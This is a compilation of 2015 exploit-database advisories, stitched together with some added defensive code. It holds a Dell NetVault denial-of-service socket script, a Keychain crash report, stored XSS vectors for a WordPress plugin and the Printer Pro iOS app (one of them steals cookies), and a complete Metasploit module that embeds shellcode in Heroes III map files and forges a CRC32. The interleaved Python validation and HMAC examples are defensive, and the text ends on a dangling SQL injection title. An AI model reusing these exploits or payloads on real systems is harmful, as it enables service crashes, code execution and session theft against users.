
"""
Product: Dell Netvault Backup
Link: http://software.dell.com/products/netvault-backup/
Vendor: Dell
Vulnerable Version(s): 10.0.1.24 and probably prior
Tested Version: Version 10.0.1.24
Advisory Publication: July 30, 2015 
Vendor Notification: January 9, 2015
Public Disclosure: July 30, 2015
Vulnerability Type: Remote Denial of service
CVE Reference: CVE-2015-5696
Risk Level: Medium
Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24

-----------------------------------------------------------------------------------------------

Advisory Details:

Reverse engineering of the protocol turned up several ways to crash the nvpmgr.exe process. The entire application (all processes) dies and does not restart by itself; someone has to restart it manually.

Proof of concept script:
"""

#!/usr/bin/python
import socket as so
from struct import *

server = "192.168.140.130"
port = 20031
d = "\x18\x00\x00\x00"  
d += "\x01" 

#d += "\xCB\x22\x77\xC9" # Another crash example
d += "\x18\xE8\xBE\xC8" # Will cause the crash
d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6  
d += "\x00" # null byte

##
# send it

s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send(d)
s.close()

"""
-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.

The fix done by Dell was not checked by the researcher.

-----------------------------------------------------------------------------------------------
"""
            
# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
# Date: 22/07/2015
# Exploit Author: Juan Sacco
# Vendor Homepage: https://www.apple.com
# Software Link: https://www.apple.com/en/downloads/
# Version: 9.0 (55161)
# Tested on: OSX Yosemite 10.10.4
# CVE : None

# History - Reported to product-security@apple.com 20 Jul 2015
# Be careful: Crashing the Keychain will affect the user's ability to use Keychain-stored passwords.

# How to reproduce it manually
1. Select a certificate, right click "New certificate preference.."
2. Under "Location or Email address:" add random values +9000
3. Click on Add to conduct the PoC manually

# Technically:
Performing @selector(addCertificatePreference:) from sender NSButton
0x608000148cf0

# Exception type
Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_PROTECTION_FAILURE at 0x00007fff4d866828
External Modification Warnings:
VM Regions Near 0x7fff4d866828:
    MALLOC_SMALL           00007f9e7d000000-00007f9e80000000 [ 48.0M] rw-/rwx SM=PRV
--> STACK GUARD            00007fff4c7de000-00007fff4ffde000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 0
    Stack                  00007fff4ffde000-00007fff507de000 [ 8192K] rw-/rwx SM=COW  thread 0

(lldb)
Process 490 resuming
Process 490 stopped

* thread #1: tid = 0x19b7, 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x7fff4d866828)

    frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325

Security`SecCertificateSetPreference:

->  0x7fff92c663c3 <+325>: callq  0x7fff92cf18b2            ; symbol stub for: CFStringGetCString
    0x7fff92c663c8 <+330>: movq   %rbx, -0x670(%rbp)
    0x7fff92c663cf <+337>: testb  %al, %al
    0x7fff92c663d1 <+339>: jne    0x7fff92c663d8            ; <+346>

Process:               Keychain Access [598]
Path:                  /Applications/Utilities/Keychain Access.app/Contents/MacOS/Keychain Access
Identifier:            com.apple.keychainaccess
Version:               9.0 (55161)
Build Info:            KeychainAccess-55161000000000000~620
Code Type:             X86-64 (Native)
Parent Process:        ??? [1]
Responsible:           Keychain Access [598]
User ID:               501

Date/Time:             2015-07-28 13:32:05.183 +0200
OS Version:            Mac OS X 10.10.4 (14E46)
Report Version:        11
Anonymous UUID:        08523B58-1EF8-DC4A-A7D7-CB31074E4395
Crashed Thread:        0  Dispatch queue: com.apple.main-thread

VM Regions Near 0x7fff507776c8:
    MALLOC_SMALL           00007ff93c800000-00007ff93e000000 [ 24.0M] rw-/rwx SM=PRV
--> STACK GUARD            00007fff4e5d7000-00007fff51dd7000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 0
    Stack                  00007fff51dd7000-00007fff525d7000 [ 8192K] rw-/rwx SM=COW  thread 0

  rax: 0x0000000001e5e1a0  rbx: 0x0000000000000006  rcx: 0x0000000008000100  rdx: 0x0000000001e5e1a0
  rdi: 0x000060000045b6c0  rsi: 0x00007fff507776d0  rbp: 0x00007fff525d5f30  rsp: 0x00007fff507776d0
   r8: 0x0000000000000000   r9: 0x00007fff79e6a300  r10: 0x00007ff93c019790  r11: 0x00007fff79147658
  r12: 0x000000000000002d  r13: 0x00007fff507776d0  r14: 0x00007fff525d5880  r15: 0x00007ff93ae41680
  rip: 0x00007fff901083c3  rfl: 0x0000000000010202  cr2: 0x00007fff507776c8
            
Job Manager Persistent XSS

Details
========================================================================================
Product: Job Manager Plugin For Wordpress
Vendor-URL: www.wp-jobmanager.com
CVE-ID: CVE-2015-2321


Credits
========================================================================================
Discovered by: Owais Mehtab


Affected Products:
========================================================================================
Job Manager Plugin <= 0.7.22

Description
========================================================================================
"Job Manager Plugin For Wordpress"

More Details
========================================================================================
A persistent cross-site scripting (XSS) vulnerability has been discovered in the Job Manager plugin:
the plugin's email field is not sanitized, so the flaw is easily exploited and can be used to
steal cookies, perform phishing attacks and carry out various other attacks that compromise
the security of a user.

Proof of Concept
========================================================================================
Click on "send through your résume" and set the vector below in the email field

'"><img src=x onerror=prompt(document.cookie);>

Now click on initiate chat 

PoC Video
https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
      'Description'    => %q{
          This module embeds an exploit into an uncompressed map file (.h3m) for
        Heroes of Might and Magic III. Once the map is started in-game, a
        buffer overflow occurring when loading object sprite names leads to
        shellcode execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pierre Lindblad', # Vulnerability discovery
          'John AAkerblom'   # Vulnerability discovery, PoC and Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '37716' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
            {
              # Two "Anticrash"-gadgets are needed or the game will crash before ret
              #
              # Anticrash1, needs to pass the following code down to final JMP:
              # MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
              # XOR EBX, EBX
              # CMP EAX, EBX
              # JE SHORT <crash spot> ; JMP to crash if EAX is 0
              # MOV CL, BYTE PTR DS : [EAX - 1]
              # CMP CL, BL
              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
              # CMP CL, 0FF
              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
              # CMP EDI, EBX
              # JNE <good spot> ; JMP to good spot. Always occurs if we get this far
              #
              # Summary: An address which, when incremented by 4 and then dereferenced,
              # leads to, for example, a string that is preceded by neither a 0x00 nor a 0xFF byte
              'Anticrash1' => 0x004497D4,
              # Anticrash2, needs to return out of the following call (tricky):
              #
              # MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
              # CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
              #
              # Summary: An address which, when dereferenced, leads to an address that,
              # when incremented by 4 and then dereferenced, leads to a function returning
              # without accessing any registers/memory that would cause a crash.
              'Anticrash2' => 0x006A6430,
              'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
              'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
            }
          ],
          [
            'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
            {
              'Anticrash1' => 0x00456A48,
              'Anticrash2' => 0x006A6830,
              'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
              'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
            }
          ],
          [
            'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
            {
              # The two anticrash gadgets are accessed in reverse order for this target,
              # meaning that the documentation above for Anticrash1 applies to Anticrash2
              # here. However, Anticrash1 here is accessed differently than the other targets.
              # Anticrash1, needs to pass the following code:
              # CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
              # JNE 00591F37
              # MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
              'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
              # Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
              'Anticrash2' => 0x005CE200,
              'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
              'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
              'CRC32' => 0xFEEFB9EB
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 29 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',
                      [
                        false,
                        'If file exists, exploit will be embedded' \
                          ' into it. If not, a new default h3m file where' \
                          ' it will be embedded will be created.',
                        'sploit.h3m'
                      ])
      ], self.class)
  end

  def exploit
    buf = ''

    # Load h3m into buffer from uncompressed .h3m on disk/default data
    begin
      buf << read_file(datastore['FILENAME'])
      print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
    rescue Errno::ENOENT
      print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
        'default .h3m data')
      buf << make_default_h3m
    end

    # Find the object attributes array in the file by searching for a sprite name that occurs
    # as the first game object in all maps.
    objects_pos = buf.index('AVWmrnd0.def')
    if objects_pos.nil?
      print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
        '. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
      return
    end

    # Entries in the objects array start with a string size followed by game sprite name string
    # Move back 4 bytes from the first sprite name to get to the start of the objects array
    objects_pos -= 4

    print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)

    # Construct a malicious object entry with a big size, where the sprite name starts
    # with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
    # but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
    # After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
    # overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
    # it returns to the CALL ESP-gadget are required for the game not to crash before returning.
    size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
    exp = ''
    exp << [size].pack('V')
    exp << "\x00" * 7 # The first byte terminates the string, the next 2 don't matter, the last 4 need to be 0
    exp << rand_text(target['Padding'])
    exp << [target.ret].pack('V')
    exp << [target['Anticrash1']].pack('V')
    exp << [target['Anticrash2']].pack('V')
    exp << payload.encoded

    # Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
    from = objects_pos
    to = from + size
    buf[from..to] = exp
    print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)

    # Demo version has a crc32 check to disallow other maps than the one it comes with.
    if target['CRC32']
      buf = forge_crc32(buf, target['CRC32'])
      if Zlib.crc32(buf) == target['CRC32']
        print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
      else
        print_error('Failed to forge CRC32')
        return
      end
    end

    # Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
    file_create(buf)
  end

  def substring_pos(string, substring)
    string.enum_for(:scan, substring).map { $~.offset(0)[0] }
  end

  #
  # Loads a file
  #
  def read_file(fname)
    buf = ''
    ::File.open(fname, 'rb') do |f|
      buf << f.read
    end

    buf
  end

  #
  # Returns data for a minimum required S-size h3m map containing 2 players
  #
  def make_default_h3m
    buf = ''

    # Set map specifications to 36x36 (0x24000000) map with 2 players, with
    # default/no settings for name, description, victory condition etc
    buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
    buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
    buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
    buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
    buf << "\x00\x00\xff\xff\xff\x00"
    buf << "\xFF" * 16
    buf << "\x00" * 35

    # Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
    buf << "\x00" * (36 * 36 * 7)

    # Set object attribute array count to 1
    buf << "\x01\x00\x00\x00"

    # Size of first sprite name, this will be overwritten
    buf << "\x12\x34\x56\x78"

    # Standard name for first object, which will be searched for
    buf << 'AVWmrnd0.def'

    buf
  end

  #
  # Forge crc32 by adding 4 bytes at the end of data
  # http://blog.stalkr.net/2011/03/crc-32-forging.html
  #
  def forge_crc32(data, wanted_crc)
    crc32_reverse = [
      0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
      0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
      0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
      0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
      0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
      0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
      0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
      0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
      0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
      0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
      0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
      0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
      0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
      0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
      0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
      0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
      0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
      0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
      0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
      0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
      0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
      0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
      0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
      0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
      0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
      0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
      0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
      0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
      0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
      0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
      0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
      0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
      0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
      0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
      0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
      0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
      0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
      0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
      0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
      0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
      0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
      0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
      0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
      0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
      0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
      0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
      0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
      0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
      0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
      0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
      0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
      0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
      0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
      0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
      0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
      0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
      0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
      0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
      0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
      0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
      0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
      0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
      0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
      0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
    ]

    # forward calculation of CRC up to pos, sets current forward CRC state
    fwd_crc = 0xffffffff
    data.each_byte do |c|
      fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
    end

    # backward calculation of CRC up to pos, sets wanted backward CRC state
    bkd_crc = wanted_crc ^ 0xffffffff

    # deduce the 4 bytes we need to insert
    # 'V' is a 32-bit little-endian unsigned int, as used elsewhere in this module
    # ('<L' is not a valid pack directive; the endian modifier belongs after the letter)
    [fwd_crc].pack('V').each_byte.reverse_each do |c|
      bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
    end

    res = data + [bkd_crc].pack('V')
    res
  end
end
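The root cause the module exploits is a length field that the game trusts when it copies a sprite name into a fixed buffer. As an added example (not the module's, the project's or the game's code), the Python below parses the object attribute array in the layout the module describes and writes in make_default_h3m (a u32 count, then a u32 size followed by the sprite name for each entry; real entries carry further fields, which are omitted here) and rejects any size that exceeds the remaining input or a cap. The 64-byte cap is an assumption, the sample arrays are constructed, and the oversized entry reproduces only the shape the module describes (7 NUL bytes, 121 bytes of padding, three 4-byte slots, payload) using filler bytes.

```python
import struct
from typing import List, Optional, Tuple

# Cap on a sprite-name length. This is an assumption of the example; the real
# format's limit is not given on the page. The name the module relies on
# ("AVWmrnd0.def") is 12 bytes.
MAX_SPRITE_NAME = 64


class H3MFormatError(ValueError):
    """Raised when a length field in the object attribute array cannot be trusted."""


def parse_object_attributes(buf: bytes, offset: int) -> List[str]:
    """Parse the object attribute array starting at `offset`: a u32 count, then
    per entry a u32 size followed by that many bytes of sprite name. Every size is
    checked against the cap and against the remaining input before a single byte
    is read, which is the check a loader must make before copying into a buffer."""
    if len(buf) - offset < 4:
        raise H3MFormatError("truncated object count")
    (count,) = struct.unpack_from("<I", buf, offset)
    pos = offset + 4
    names: List[str] = []
    for i in range(count):
        if len(buf) - pos < 4:
            raise H3MFormatError(f"entry {i}: truncated size field")
        (size,) = struct.unpack_from("<I", buf, pos)
        pos += 4
        if size > MAX_SPRITE_NAME:
            raise H3MFormatError(f"entry {i}: size {size} exceeds cap {MAX_SPRITE_NAME}")
        if size > len(buf) - pos:
            raise H3MFormatError(f"entry {i}: size {size} exceeds remaining {len(buf) - pos} bytes")
        raw = buf[pos:pos + size]
        pos += size
        if b"\x00" in raw:
            raise H3MFormatError(f"entry {i}: NUL byte inside sprite name")
        try:
            names.append(raw.decode("ascii"))
        except UnicodeDecodeError as exc:
            raise H3MFormatError(f"entry {i}: non-ASCII sprite name") from exc
    return names


def check_map_objects(buf: bytes, offset: int = 0) -> Tuple[Optional[List[str]], Optional[str]]:
    """Wrapper returning (names, None) on success or (None, reason) on rejection."""
    try:
        return parse_object_attributes(buf, offset), None
    except H3MFormatError as exc:
        return None, str(exc)


def build_object_array(names: List[bytes]) -> bytes:
    """Constructed well-formed input in the layout make_default_h3m writes."""
    out = struct.pack("<I", len(names))
    for name in names:
        out += struct.pack("<I", len(name)) + name
    return out


def build_oversized_entry(payload_len: int = 32) -> bytes:
    """Constructed input with the shape of the module's malicious entry: a size
    covering 7 NUL bytes, 121 bytes of padding, three 4-byte slots and a payload.
    Everything here is filler; the point is that the size field is the tell."""
    size = 7 + 121 + 4 + 4 + 4 + payload_len
    body = b"\x00" * 7 + b"A" * 121 + b"\x00" * 12 + b"B" * payload_len
    return struct.pack("<I", 1) + struct.pack("<I", size) + body


def build_truncated_entry() -> bytes:
    """Constructed input whose size field promises more bytes than the file holds."""
    return struct.pack("<I", 1) + struct.pack("<I", 40) + b"short"


if __name__ == "__main__":
    print(check_map_objects(build_object_array([b"AVWmrnd0.def", b"constructed.def"])))
    print(check_map_objects(build_oversized_entry()))
    print(check_map_objects(build_truncated_entry()))
```

The order of the two size checks matters: the cap catches an entry whose size is covered by the file (the exploit extends the file so its 172 bytes are present), and the remaining-bytes check catches a truncated file that the cap alone would accept.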
            
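The demo target's CRC32 check shows why a checksum is not an integrity control: forge_crc32 in the module appends four bytes that steer any file to a chosen CRC. The Python below is an added example, not the module's code. It derives the 256-entry reverse table the module hard-codes from the zlib polynomial, reproduces the forge (the same stalkr method the module cites) and contrasts it with a keyed HMAC that the same tampering does not survive. The map bytes and the key are constructed; 0xFEEFB9EB is the CRC the module targets for the demo build.

```python
import hashlib
import hmac
import struct
import zlib

CRC32_POLY = 0xEDB88320  # reflected form of the CRC-32 polynomial zlib uses


def crc32_reverse_table() -> list:
    """Derive the reverse table the module hard-codes. Running the CRC shift
    register backwards for 8 bits from each possible top byte gives the term
    that undoes one forward step. Entries 1 and 2 come out as 0xDB710641 and
    0x6D930AC3, the values at the head of the module's list."""
    table = []
    for i in range(256):
        crc = i << 24
        for _ in range(8):
            if crc & 0x80000000:
                crc = (((crc ^ CRC32_POLY) << 1) | 1) & 0xFFFFFFFF
            else:
                crc = (crc << 1) & 0xFFFFFFFF
        table.append(crc)
    return table


REVERSE_TABLE = crc32_reverse_table()


def forge_crc32(data: bytes, wanted_crc: int) -> bytes:
    """Append four bytes so that zlib.crc32(result) == wanted_crc. zlib.crc32
    returns the finalised value, so the raw register state is recovered by
    undoing the final XOR instead of re-running the forward table."""
    fwd_state = zlib.crc32(data) ^ 0xFFFFFFFF
    bkd_state = wanted_crc ^ 0xFFFFFFFF
    # Walk the backward recurrence over the forward state's bytes, last byte first.
    for c in reversed(struct.pack("<I", fwd_state)):
        bkd_state = ((bkd_state << 8) & 0xFFFFFFFF) ^ REVERSE_TABLE[bkd_state >> 24] ^ c
    return data + struct.pack("<I", bkd_state)


def hmac_tag(key: bytes, data: bytes) -> bytes:
    """A keyed MAC: what an integrity check needs when the input is attacker-controlled."""
    return hmac.new(key, data, hashlib.sha256).digest()


def hmac_verify(key: bytes, data: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(hmac_tag(key, data), tag)


def demo() -> dict:
    """Constructed inputs: a stand-in for map bytes, a tampered copy forged to the
    demo build's CRC, and a made-up publisher key for the HMAC comparison."""
    original = b"constructed h3m map bytes " * 8
    forged = forge_crc32(original + b"tampered", 0xFEEFB9EB)
    key = b"constructed-publisher-key"
    return {
        "crc_matches_target": zlib.crc32(forged) == 0xFEEFB9EB,
        "hmac_accepts_original": hmac_verify(key, original, hmac_tag(key, original)),
        "hmac_accepts_forged": hmac_verify(key, forged, hmac_tag(key, original)),
    }


if __name__ == "__main__":
    print(demo())
```

A CRC is linear, which is exactly what makes the four-byte fix-up possible; a MAC keyed with a secret the file's author does not hold, or a signature verified against a pinned public key, is the control that actually binds the file to its publisher.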
HireHackking

Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting

Document Title:
===============
Printer Pro 5.4.3 IOS - Cross Site Scripting

Credits & Authors:
==================
TaurusOmar - @TaurusOmar_ (taurusomar13@gmail.com) [taurusomar.blogspot.com]

Release Date:
=============
2015-08-11

Product & Service Introduction:
===============================
Print attachments, documents, web pages and more right from your iPhone and iPad to any Wi-Fi or USB printer. Printer Pro lets you wirelessly print from the iPhone or iPad. It can print directly to many Wi-Fi printers or any printer attached to your Mac or PC via a helper application installed on your computer. Once installed, Printer Pro appears in the "Open In..." list on your device. This lets you print documents from Mail, PDF Expert and many other applications on your iPhone or iPad that support this function.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/printer-pro-print-documents/id393313223?mt=8)

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered multiple vulnerabilities in the official application Printer Pro 5.4.3.

Vulnerability Disclosure Timeline:
==================================
2015-08-11: Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
Readdle
Product: Printer Pro 5.4.3 - iOS Mobile Application

Exploitation Technique:
=======================
Local

Severity Level:
===============
Low

Technical Details & Description:
================================
An application-side input validation vulnerability has been discovered in the official Printer Pro 5.4.3 iOS mobile application. The vulnerability allows a local attacker to inject own script code as payload into the application-side of the vulnerable service function or module.

The vulnerability exists in the Name text box of contacts: the injected code is activated when the application is opened and the contact containing the script is selected for printing.

Request Method(s):
[+] Import

Vulnerable Module(s):
[+] Add Contact

Vulnerable Parameter(s):
[+] TextBox Name

Vulnerable Final(s):
[+] Print Contact

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with a system user account and without . For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

1. Install the iOS application ( https://itunes.apple.com/us/app/printer-pro-print-documents/id393313223?mt=8 )
2. Add a new contact with the script in the Name text box
3. Start the app and open the import function
4. Select the contact that contains the script
5. Successful reproduction of the persistent vulnerability!

Proof of Concept (IMAGES):
1. http://i.imgur.com/yku1o1c.jpg
2. http://i.imgur.com/Q5O3X15.jpg
3. http://i.imgur.com/uPhL9Ow.jpg

PoC: Cross Site Scripting
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>

Security Risk:
==============
The security risk of the persistent input validation vulnerability in the name value is estimated as medium. (CVSS 3.7)
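The missing step is the same in the Job Manager advisory above (the unsanitized email field) and in this Printer Pro advisory (the contact Name field): validate on input where the field has a known shape, and encode on output regardless. The Python below is an added example and not code from either product (the plugin is PHP, the app is iOS); the allow-list regex and the rendering function are assumptions for the demonstration, the two vectors are the ones quoted in the two advisories, and the benign address is constructed.

```python
import html
import re
from typing import Optional

# The two stored-XSS vectors quoted in the advisories, plus a constructed benign value.
JOB_MANAGER_EMAIL_VECTOR = "'\"><img src=x onerror=prompt(document.cookie);>"
PRINTER_PRO_NAME_VECTOR = (
    '<object data="data:text/html;base64,'
    'PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>'
)
BENIGN_EMAIL = "applicant@example.com"

# Allow-list for an email address (an assumption of this example, not the plugin's
# rule): local part, one "@", dotted domain. Quotes, angle brackets and spaces
# never match, so the Job Manager vector is rejected before it is ever stored.
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


def is_valid_email(value: str) -> bool:
    """Input validation: accept only values shaped like an address."""
    return _EMAIL_RE.fullmatch(value) is not None


def escape_for_html(value: str) -> str:
    """Output encoding: <, >, &, ' and " become entities, so whatever was stored
    renders as text instead of markup."""
    return html.escape(value, quote=True)


def render_contact_row(name: str, email: str) -> str:
    """Render two stored fields into an HTML fragment the way an applicant list or
    a print preview would. Every interpolated value goes through escape_for_html,
    including the one placed inside the href attribute."""
    safe_name = escape_for_html(name)
    safe_email = escape_for_html(email)
    return f'<tr><td>{safe_name}</td><td><a href="mailto:{safe_email}">{safe_email}</a></td></tr>'


def accept_application(name: str, email: str) -> Optional[str]:
    """Validate on the way in, escape on the way out: returns the rendered row, or
    None when the email fails the allow-list. A person's name cannot be allow-listed
    as tightly, so for that field the output encoding is what does the protecting."""
    if not is_valid_email(email):
        return None
    return render_contact_row(name, email)


if __name__ == "__main__":
    print(accept_application("Jane", JOB_MANAGER_EMAIL_VECTOR))
    print(accept_application(PRINTER_PRO_NAME_VECTOR, BENIGN_EMAIL))
```

Validation alone would not have saved the Printer Pro case, because a name field legitimately contains characters an address does not; encoding at the point where the value is rendered (or, in the iOS app, displaying it in a text control rather than a web view) is the control that applies to both.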

WordPress Plugin Video Gallery 2.7 - SQL Injection

